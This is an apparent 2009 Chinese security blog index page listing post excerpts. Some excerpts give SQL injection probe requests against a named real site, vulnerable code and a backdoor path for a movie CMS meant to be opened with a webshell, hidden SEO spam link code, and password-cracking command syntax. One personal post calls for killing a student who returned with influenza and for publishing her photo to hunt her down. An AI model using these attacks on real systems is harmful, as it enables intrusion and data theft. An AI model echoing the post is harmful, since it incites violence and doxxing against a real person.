simeon技术专栏 - 51CTO技术博客 - 领先的IT技术博客

文章

文章列表>>

安天原创全球IP 定位软件

2009-06-23 12:38:45

可以寻找单个IP或域名，支持文件批量方式，批量方式要求每一行一个IP或域名+注释，注释与IP或域名之间用空格：制表符分开。方便管理也查询，特定方式只是个标志，没有功能。域名解析要求有网络支持。IPQQwry要求有纯真数据库QQwry支持

类别：工具软件 | 阅读全文(138) | 回复(1)

免安装版本的cain工具

2009-06-22 09:24:02

昨天晚上弄的免安装版本cain，喜欢的朋友可以玩玩。欢迎进行探讨。

类别：工具软件 | 阅读全文(218) | 回复(3)

首页绑架克星HiJackThis工具软件

2009-06-17 21:06:00

首页绑架克星 - HijackThis，它能够将绑架您浏览器的程序揪出来！并且移除之！或许您只是浏览某个网站、安装了某个软件，就发现浏览器设定已经被绑架了，一般常见的绑架方式莫过于强制窜改您的浏览器首页设定、搜寻页设定，现在有了这个工具，可以将所有可疑的程序全抓出来，再让您判断哪个程序是肇祸者！把它给杀了！

类别：工具软件 | 阅读全文(95) | 回复(1)

SQL注入自动扫描工具中的语句

2009-06-17 19:09:10

SQL注入自动扫描工具中的语句
包括猜解数据库库名、表名、字段名、字段内容（表内容）、表条数，以及测试相关的权限。
（mssql/mysql)
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@version%3E1--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@servername%3E0--%20and%201=1
GET http://xgzx.whcm.com...

类别：备忘录 | 阅读全文(78) | 回复(0)

webScanProxy

2009-06-17 19:07:11

主要用途：
分析网站扫描工具的方法，如注入、跨展、cookie伪造等。另外，就是跳过NTLM认证。
还有就是网站url地址过滤。
下面是主要特性说明：

1.记录URL地址：可以分析sql注入工具的探测语句，便于sql注入学习与手动注入
2.支持NTLM认证：目前绝大部分sql等网站扫描工具不支持域认证方式。
3.支持url地址过滤：目前绝大部分sql等网站扫描工具(含业界顶尖的appScan/webinspect等）
            都无法过滤"new1234.htm"这样的因为数字1234不一样而类似页面（现有都是只能过滤id=xx这样的参数重复）
            支持正则表达式。还可以用在目录过滤、url关键词过滤等
4.支持服务器返回Response里面的时间修改：有一些软件通过http服务器返回头里面的DATE时间来判定产品过期
            （这其实我最初的开发目的）
5.其他如多线程、隐藏到任务栏等就不一一说了。

类别：工具软件 | 阅读全文(62) | 回复(0)

火龙果要买大的好吃

2009-06-17 19:06:16

上次去菜市场买的火龙果不大，吃起来口感和味道不如大的。而且越大的火龙果性价比比较高。火龙果外层的皮在整个重量中占据了很大一部分，所有越大的火龙果肉越多，当然超值啦。

类别：备忘录 | 阅读全文(41) | 回复(2)

亿科影视系统0day

2009-06-17 18:21:43

亿科影视系统0day
原文地址：

http://www.3hsg.net/post/yikeyingshi0day.php
官网:
http://www.moviecms.cn/

影响版本:
软件版本信息： 1.2.0 access (其他还未试过)
未出补丁

程序介绍:

采用S/B三层结构编写逻辑更清晰维护更简单,页面显示更快,执行效率更高
栏目自由分类
地区添加修改
独特的专题栏目
可生成HTML与动态切换
方便快速的一键生成生成进度的显示
逻辑清晰管理更方便
系统集成主流播放器 Qvod 17bobo 迅雷 youku 土豆 56 新浪视频 QQ视频 sohu视频 6间房 Flv 流媒体等播放器
后台自由的播放器设置
强大的播前广告
幻灯随意修改添加
方便的友情连接管理
风格模板标签编辑强大的模板功能简单的模板标签

漏洞分析:
在文件inc/formovie.asp中：

view plaincopy to clipboardprint?
dim fortime
fortime=now()
conn.execute("INSERT INTO "&web_dbtop&"formovie (forcontent,fortime) VALUES ('"&DelHtml(NoSqlHack(Trim(Request.QueryString("Formovie"))))&"','"&fortime&"')")
//第六行Formovie变量经过了NoSqlHack和DelHtml进行过滤.
dim fortime
for..

类别：安全技术研究 | 阅读全文(32) | 回复(0)

亿科影视管理系统1.2.0版以及1.0版本均有后门

2009-06-17 18:20:39

亿科影视管理系统1.2.0版以及1.0版本均有后门
后门地址为/inc/page.asp
默认数据库为/data/#db.asp
使用一句话连接即可。且可以在登陆系统后直接备份得到shell

类别：安全技术研究 | 阅读全文(65) | 回复(3)

强烈谴责女留学生祸害国人

2009-06-15 19:39:28

   今天获悉一女留学生回国后，在北京故意多次乘坐公交车和地铁，而后二日被确诊为为最新的H流感，其用心之险恶，其目的是什么我想大家都知道，这种女人估计是国外收买的间谍，真该杀了她！今天突增44例，估计北京或许逃脱不了传播，多灾多难的祖国！
   本来这些都是可以避免的，建议国家相关部门采取以下一些措施：
（1）着力调查该女留学生，出国的人，素质应该有的，特别对于这种传播性的疾病，估计存在问题，跟上次那个法国的留学生一样，就是一个汉奸。
（2）拒绝国外留学人员非公或者非紧急情况回国，凡回国人员必须进行监控，在确保未感染的情况下才允许自由行动，其实回来就可能携带病毒，最好下机后立刻进行杀毒！
（3）处理善后事宜，建议网上发布该人的照片进行追杀，有密切接触的朋友主动报告政府。
（4）加强对留学人员的管理，很多汉奸就是出自这些留学人员，这些人员还可能出于国家高位，建议加强问责制，加强媒体监督。特别对于哪些危害国家安全、毒害群众身体健康的事情尤其要彻查到底。
   真是可悲，可气，无奈和无耻！

类别：个人随笔 | 阅读全文(540) | 回复(14)

利用窗口引用漏洞和XSS漏洞实现浏览器劫持

2009-06-08 15:05:16

利用窗口引用漏洞和XSS漏洞实现浏览器劫持

　XSS漏洞从Session劫持、钓鱼、XSS WORM等主流攻击方式发展到现在，告诉了大家一个真正的跨站师是不会被条条框框所束缚，跨站师们在不断的创新，跨站师们会展示XSS漏洞的所有可能。
　　一、前言

　　最近国内关于XSS漏洞的技术文档都比较少，所以决定写这篇文档，其中的很多细节和朋友们都沟通讨论很久了，其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session劫持、钓鱼、XSS WORM等主流攻击方式发展到现在，告诉了大家一个真正的跨站师是不会被条条框框所束缚，跨站师们在不断的创新，跨站师们会展示XSS漏洞的所有可能。

　　二、同源策略简叙

　　同源策略是浏览器的安全基础，它是浏览器支持的客户端脚本的重要安全标准，我们可以从“源”上了解这一安全标准，按照W3C的标准这个“源”包括域名、协议和端口，各大浏览器都曾爆出过很多同源策略漏洞，危害程度各有不同，比如从06年开始流行至今的MS06-014网页木马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个漏洞，然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性，最终实现浏览器劫持。

　　三、理解wind..

类别：安全技术研究 | 阅读全文(71) | 回复(0)

老外手工注射录像

2009-06-08 14:21:30

MsSQL-Injection.zip 解压就可以了，我看的不是很清楚，呵呵，手工注射还是不错的。

类别：安全技术研究 | 阅读全文(136) | 回复(0)

世界上最快的md5破解软件

2009-06-08 13:22:05

World Fastest MD5 cracker BarsWF
http://3.14.by/en/md5
破解命令格式如下：barswfx32 -c 00000000 -h 25d55ad283aa400af464c76d713c07ad
-c 后面跟的是密码设置，-h后面跟的是32位的hash值。
破解效果如图1所示

图1 破解效果图

类别：工具软件 | 阅读全文(254) | 回复(1)

ftp账号暴力破解工具

2009-06-08 12:43:57

华夏黑客联盟提供的ftp暴力破解工具，我对其中进行了修改去除了运行就访问两个站点，破解成功跟用户名和密码字典强度有关。即跟以下两个条件有关：
（1）知道确切的用户账号
（2）一个足够强大的字典。

类别：工具软件 | 阅读全文(260) | 回复(1)

不错的一个国外安全论坛

2009-06-08 12:08:58

类别：个人随笔 | 阅读全文(140) | 回复(0)

中国航天人才市场网站被黑达90余天

2009-06-08 10:34:36

     昨天在网上溜达，无意看到中国航天人才市场网站（www.spacetalent.com.cn）被挂马，验证地址为：http://www.spacetalent.com.cn/hr/companyInfo.asp?id=84
    后面通过抓包分析，果然如此，最近国内外都在炒作什么黑客什么的，好像被黑是一种光荣，还可以以此为理由进行索赔，真的好笑，既然提供服务就必须要保证安全，比如你坐公交车，公交车应当保证你的基本安全，否则谁会去坐，要是都声明：坐我车子的人，死了活该，我想只有傻逼才会去坐。
    今天上午好心给他们网站打了一个电话，第一个工作人员还蛮客气的，第二个就非常的不耐心，什么人哦。下面把图贴出来，有时间分析一下这些脚本和可执行程序。

图1 怀疑被挂马

图2 抓包分析

图3 使用flashget获取病毒地址和文件

类别：个人随笔 | 阅读全文(207) | 回复(4)

渗透,目的不单纯

2009-06-01 10:02:51

原文地址：http://hi.baidu.com/hackloft/blog/item/16a819171aac8701c93d6dae.html
一篇好的经验总结。
帮朋友忙帮到目的不单纯好可怜被好多兄弟教训了
甚至被威胁了下...
总结下教训...
关于单臂路由如果掌握到设备权限还是可以继续玩，另外一些对拨的vpn如果没有做好限制也可以溜达溜达，如果是帮忙的话还是小心翼翼的溜达，不要做什么很实际的操作了，因为...
先说设备
IPS IDS 自然不说了现在这些都搞复合呢 all in one 行为管理也有给复合进去的
在说流量报警和时间流量报警现在和手机整合的就是说如果在一个日均1Gb流量的网络下载一个大家伙流量超出界定范围会被发送到手机流量异常，说到手机这个东西现在的确发达了，有时候发邮件也要先搞清楚对方是不是手机在收，不过有些人貌似有手机软件的0day ...
然后有比较业务化的一些规则比如行为+时间这样算因子？或者还有更多因子的比如在9:00-17:30之外玩个IPC$或者ftp外部再或者发个邮件，那么又被记录了...
说到这里好像记得电子科技大学一个老师讲那个搞某大公司的牛人将搞到的东西分成NNNN个份更改为容量不大于某值的.gif,然后每天定时定量分多次下载... 回想自己好像根本就没这方面的意识...这次丢人..

类别：安全技术研究 | 阅读全文(135) | 回复(0)

攻防实战：巧用Cain破解MYSQL数据库密码

2009-06-01 09:34:14

攻防实战：巧用Cain破解MYSQL数据库密码
陈小兵

MYSQL数据库用户密码跟其它数据库用户密码一样，在应用系统代码中都是以明文出现的，在获取文件读取权限后即可直接从数据库连接文件中读取，例如asp代码中的conn.asp数据库连接文件，在该文件中一般都包含有数据库类型，物理位置，用户名和密码等信息；而在MYSQL中即使获取了某一个用户的数据库用户（root用户除外）的密码，也仅仅只能操作某一个用户的数据库中的数据。

在实际攻防过程中，在获取Webshell的情况下，是可以直下载MYSQL数据库中保留用户的user.MYD文件，该文件中保存的是MYSQL数据库中所有用户对应的数据库密码，只要能够破解这些密码那么就可以正大光明的操作这些数据，虽然网上有很多修改MYSQL数据库用户密码的方法，却不可取，因为修改用户密码的事情很容易被人发现！
研究MYSQL数据库的加解密方式，在网络攻防过程中具有重要的意义；试想一旦获取了网站一定的权限后，如果能够获取MYSQL中保存用户数据，通过解密后，即可通过正常途径来访问数据库；一方面可以直接操作数据库中的数据，另一方面可以用来提升权限。通过在网络上查找资料，目前关于破解MYSQL方面的研究不多，本文算是抛砖引玉，虽..

类别：安全技术研究 | 阅读全文(533) | 回复(4)

挂隐藏链接的4种代码

2009-05-28 10:40:01

种挂隐藏链接的代码
如果您不晓得什么是隐藏链接,或者不晓得隐藏链接的作用,
那么您需要马上百度一下了..
正文:
DIV:
<div style="display:none;">
<a href=http://hi.baidu.com/hack078/
target="_blank">天使之翼</a></div>
javascript:
<script language="javascript" type="text/javascript">
document.write("<div style='display:none;'>");
</script><div>
<a href=http://hi.baidu.com/hack078/>天使之翼</a>
<script language=”javascript” type=”text/javascript”>
document.write(”</div>”);
</script>

html:
<marquee height=1 width=5 SCROLLAMOUNT=3000 SCROLLDELAY=20000>
<a href=http://hi.baidu.com/hack078/>天使之翼</a>
</MARQUEE>

css1:
<div style="position: absolute; top: -999px;left: -999px;">
<a href=http://hi.baidu.com/hack078/>天使之翼</a>
</div>

css2:
<div style="position:absolute;left:expression(1-900)
;top:expression(3-999);">
<a href=http://hi.baidu.com/hack..

类别：安全技术研究 | 阅读全文(103) | 回复(0)

彩虹表手工生成工具

2009-05-27 22:28:22

类别：工具软件 | 阅读全文(188) | 回复(1)

新书预告＜黑客渗透笔记＞快赏

2009-05-27 21:14:16

我一个朋友写的书，感觉不错，喜欢的朋友可以买一本来看看，物有所值！
以下是关于该书的一些介绍。

原点注：我写的，大家多多捧场了，呵呵！序是请LCX写的！
官方连接：http://www.nohack.cn/bbs/thread-96363-1-1.html

新书预告＜黑客渗透笔记＞快赏

类别：备忘录 | 阅读全文(166) | 回复(2)

<< 1 2 3 4 5 >> 页数 ( 1/73 )

刘源	Shenleigang
Chinaperrylee	xyjhf321
李云	Realzjy
FinderCheng	vfast_chenxy
张广斌	朱坤
wws5201985	月之暗面